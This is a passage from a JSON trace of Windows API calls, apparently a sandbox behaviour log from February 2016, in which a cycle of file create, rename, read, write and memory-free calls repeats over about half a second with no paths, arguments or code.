"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:42,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,954", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,984", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,984", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,004", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:43,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:43,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:43,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:43,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
